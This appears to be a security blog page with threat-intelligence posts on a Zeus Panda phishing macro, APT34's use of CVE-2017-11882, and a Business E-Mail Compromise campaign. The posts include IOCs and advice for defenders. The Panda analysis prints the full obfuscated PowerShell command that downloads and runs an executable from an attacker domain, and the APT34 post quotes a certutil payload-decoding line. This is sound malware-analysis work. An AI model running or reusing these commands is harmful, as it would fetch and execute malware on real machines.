Panda Banker hits Italy – Analysis Part 1

Overview

During the analysis of network traffic collected inside the network of one of our customers by our system “Cyber Alastair sensor”, we have identified an HTTP request to a domain that immediately triggers our attention: h7de6mkn678k.tk
Further threat intelligence investigations reveal that this domain is strictly related to the infamous Zeus Panda banking malware that hit Italy in the last few months, as reported also by malwaretraffic back in November.

Zeus Panda is a particularly nasty piece of software, derived from the infamous Zeus trojan, that hit the news several times this year, as reported also by the guys at phishme.com, since it provides threat actors with a lot of different ways to monetize infected hosts: from banks credentials stealing to keylogging and SOCKS proxy capabilities.

In this series of blog posts we are going to analyze the malware infection in all its stages – from the infection vector to the dissection of the final payload – in order to understand the techniques used to remain a persistent threat inside the system, the methods exploited in order to exfiltrate information from the infected machine, the evasion techniques leveraged by the malware to hinder its analysis, and eventually all the IOC useful to expose such kind of infections inside your network.

Infection Vector

The infection vector used to deliver this threat is the old school Microsoft Office document containing an embedded VBA macro.
The document arrived attached to a phishing e-mail that tried to persuade the victim to think that there are some kind of debts to pay and they need to be set up urgently, this simple trick is often – unfortunately – enough to exploit the panic/curiosity of the receiver and led him/her to open the document.

Once the document has been opened we can see this:

The only thing that separates us from the infection is the click on that button “Enable Content” since VBA macros are not executed automatically by default. Obviously, the document tries to persuade us to click on it by presenting a kind of partial document. This is not one of the most complex
phishing techniques that we have seen used to fool the victim to enable the macro code but, hey, it works.

So, long story short: if the victim finally decides that the hidden contents inside the document is worth his/her click on “Enable Content”, the embedded VBA macro code is eventually executed and the show begins.

Infection Analysis

We can inspect the content of the VBA macro code both statically with tools like oletool, or dynamically by actually executing the macro inside the VBA interpreter embedded in Microsoft Office Excel. The latter technique is the one we are going to use here. Let’s disable the network inside our virtual machine – we don’t want to actually download the other stage of the malware now, but only analyze the macro code – then let’s click on “Enable Content” and finally let’s open the VBA Macro by navigating to View -> Macro -> View Macros -> Edit.

The function Workbook_Open() will execute when the Microsoft Excel document opens, executing through the command ‘Shell’ the string returned from the function ‘hawaiii’ that composes the final string leveraging all the other functions. This kind of simple obfuscation techniques are used in order to bypass automatic analysis systems and possibly AV signature, avoiding to hardcode the malicious command in the macro code but rather composing it with clever tricks. However, in this particular case, we have really basic and simple obfuscation techniques to protect the malicious command so we won’t waste our time analyzing them but rather we will skip all this mess by using a simple and neat dodge to dump the command executed.

We are going to supersede the ‘Shell’ command with a strategic ‘Debug.Print’ in order to dump the content of the string in our debug console, then we execute the macro to finally have our malicious command.

We have a slightly obfuscated Powershell command here:

poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen “do{sleep 15;(.(\”{2}{0}{1}\” -f’-o’,’bject’,’new’) (\”{1}{3}{5}{0}{2}{4}\” -f’t’,’syst’,’.webclie’,’em’,’nt’,’.ne’)).(‘d’+’ow’+’nloadfil’+’e’).Invoke(‘https://h7de6mkn678k.tk/trasmetto’,’%localappdata%.exe’)}while(!$?);&(\”{0}{2}{1}\”-f’star’,’ss’,’t-proce’) ‘%localappdata%.exe'”

Ah! Here we can see exactly the domain we saw inside our customer’s network.
The Powershell command sleeps for 15 seconds – yet another technique used to try to timeout and bypass security products – and then uses a simple string composition technique to create the final command that will download a file from https://h7de6mkn678k.tk/trasmetto, save it to %localappdata%” – that is actually an alias for “%USERPROFILE%\AppData\Local – and eventually execute it.

At the time of writing the C&C at https://h7de6mkn678k.tk/trasmetto doesn’t serve anymore the second stage, however, we can recover it thanks to a not so old analysis of our document at hybrid-analysis.

From the process tree, we can see our Powershell command and the execution of the downloaded .exe.

Expanding the window we can retrieve the hash of the downloaded .exe: MD5,7d898b1260c0ea760c1de7d586cf8527
We can search it on VirusTotal, hoping that somebody uploaded it recently.

Bingo.

This post ends here, in the next one we are going to analyze the second stage of the infection.

Stay tuned and stay safe.

IOC

Document MD5 6F80250650199B6BF26E9C8022EEB09A
Document Name vat.425_info.eu.xls
Domain contacted h7de6mkn678k.tk
HTTP Request https://h7de6mkn678k.tk/trasmetto
Dropped .exe MD5 7D898B1260C0EA760C1DE7D586CF8527

 

 

APT34 – Cyber Espionage Group

FireEye ha recentemente tracciato i movimenti di un gruppo di Cyber Espionage Iraniano, a cui è stato assegnato il nome di APT 34.

Il gruppo, attivo dal 2014, sfrutta Backdoor in Powershell come principale strumento offensivo. Da diversi anni, tramite attacchi di Spear Phishing e l’utilizzo di utenze compromesse, colpisce realtà di diversi settori quali enti governativi e finanziari oltre che industrie e telecomunicazioni.

Nella più recente campagna Malware gli attaccanti sfruttano la vulnerabilità CVE-2017-11882 di Microsoft Office per eseguire codice arbitrario sui sistemi vulnerabili.

Ad oggi, 11/12/2017, i server di Malware Staging e C2 risultano attivi nella distribuzione dei file malevoli sotto elencati, indicando quindi la possibilità che queste campagne siano tuttora in corso.

Di seguito i Network IOC per individuare eventuali attacchi alla propria infrastruttura legati all’ultima campagna Malware di APT34.

Network IOCs:

Domain / IP Address Description
hxxp://media-center[.]fun Malware Staging Server (InTheCyber)
hpserver[.]online C2
anyportals[.]com C2
proxycheker[.]pro C2
hxxp://mumbai-m[.]site POWRUNER C2
hxxp://dns-update[.]club Malware Staging Server
94.23.172.164:80 Malware Staging Server
46.105.221.247 Has resolved mumbai-m[.]site & hpserver[.]online
148.251.55.110 Has resolved mumbai-m[.]site and dns-update[.]club
185.15.247.147 Has resolved dns-update[.]club
145.239.33.100 Has resolved dns-update[.]club
82.102.14.219 Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com

Overview tecnica:

La prima infezione avviene tramite l’apertura del documento con estensione “.rtf” contenente l’exploit dell’ultima vulnerabilità di Microsoft Office identificata dal CVE 2017-11882. Tale vulnerabilità risiede nella componente utilizzata per l’inserimento e la valutazione delle formule matematiche, Equation Editor (EQNEDT32.EXE).

Ulteriori informazioni: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

 

Dopo l’esecuzione del codice, viene richiamato il processo “mshta.exe” che , a sua volta, effettua il download ed esegue gli script malevoli ottenuti dal sito internet  “hxxp://mumbai-m[.]site/b.txt”.

POWRUNER Attack Sequence

Lo script “b.txt” contiene comandi PowerShell per scaricare da “hxxp://dns-update[.]club/v.txt” un ulteriore script che viene rinominato da “v.txt” a “v.vbs”.

A questo punto, lo script “v.vbs” inserisce nella directory “C:\ProgramData\Windows\Microsoft\java\” 4 componenti (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs).

Sfruttando il tool di Microsft “CertUtil.exe”, “v.vbs” decodifica le componenti precedenti droppando gli script “hUpdateCheckers.ps1” e “dUpdateCheckers.ps1”

oShell.run "cmd.exe /C certutil -f  -decode C:\ProgramData\Windows\Microsoft\java\dUpdateCheckers.base C:\ProgramData\Windows\Microsoft\java\dUpdateCheckers.ps1", 0,false

Per ottenere la persistenza sul sistema coinvolto, viene creato uno Scheduled Task per “GoogleUpdateschecker.vbs“, richiamato ogni 60 secondi e che sfrutta i file “dUpdateCheckers.ps1” e “hUpdateCheckers.ps1” per le funzionalità di controllo remoto (sfruttando anche un DGA per comunicare con i server di Comando e Controllo).

InTheCyber Analysis:

Grazie alla condivisione delle informazioni di FireEye, InTheCyber ha avviato analisi e controlli sulle infrastrutture Difese e sui sistemi degli attaccanti.

E’ stato possibile individuare ulteriori script PowerShell da cui è stato estratto un ulteriore dominio malevolo utilizzato nelle fasi di Staging dell’infezione (hxxp://media-center[.]fun).

Le analisi sono tutt’ora in corso con particolare attenzione a possibili attacchi ad infrastrutture Italiane.

 

New Threat – Business E-Mail Compromise

Durante l’attività di ricerca e di Incident Response, il CyberSecurity Center di InTheCyber ha evidenziato un aumento degli attacchi di tipo “Business E-Mail Compromise” (o “truffa del CEO”) in cui i truffatori, dopo aver sottratto le credenziali di posta tramite attacchi Phishing, inviano richieste di modifica delle coordinate bancarie ai clienti o fornitori dell’azienda coinvolta, tentando di dirottare somme di denaro su conti correnti esteri.

InTheCyber ha tracciato i movimenti di un gruppo criminale che ha preso di mira diverse società, in particolare aziende in Europa e Cina.

Modus Operandi:

Il gruppo invia e-mail di Phishing da un indirizzo IP in Georgia, falsificando il Mittente, con allegati  rinominati:

  • %Random%.pdf.html
  • %Random%.xlsx.htm

Indicatori di Compromissione (IOC):
Le credenziali così catturate, vengono inviate ad una pagina “.php” ospitata sul sito internet:

  • microsoftexcelsyn . 000webhostapp . com

Warning: L’accesso al dominio dimostra la probabile compromissione dell’utenza

 

ITC consiglia :

  • controllare accessi al sito internet “microsoftexcelsyn…”

 Se positivo:

  • resettare la password di accesso alla casella Mail degli utenti coinvolti
  • individuare la Mail e l’allegato malevolo
  • bonificare la postazione coinvolta
  • contattare i clienti/fornitori esposti per aumentare awareness

InTheCyber attualmente sta collaborando con gli enti preposti.

Per eventuale supporto è possibile contattare: blueteam[at]inthecyber.com